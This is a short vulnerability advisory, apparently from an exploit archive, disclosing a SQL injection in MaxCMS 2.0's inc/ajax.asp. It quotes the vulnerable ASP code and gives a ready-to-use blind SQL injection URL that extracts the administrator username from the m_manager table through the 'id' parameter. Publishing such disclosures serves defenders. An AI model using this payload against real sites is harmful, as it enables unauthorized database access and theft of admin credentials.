Max CMS version 2.0 suffers from a remote SQL injection vulnerability.
4ce241f5ff3608ec7dd85ff07f64a5b6d821bb6e606b77773247f7623550cab1
######################### Securitylab.ir ########################
# Application Info:
# Name: MaxCMS
# Version: 2.0
# web: http://maxcms.net
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
#\inc\ajax.asp
#
#dim action : action = getForm("action", "get")
#response.Charset="gbk"
#
#Select case action
# case "newslist" : viewNewsList
# case "newscontent" : viewNewsContent
# case "digg","tread" : scoreVideo(action)
# case "reporterr" : reportErr
# case "hit" : updateHit
# case else : main
#End Select
#terminateAllObjects
#
#http://site.com/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
#===========================================================
##################################################################
# Securitylab Security Research Team , secu_lab_ir@yahoo.com
###################################################################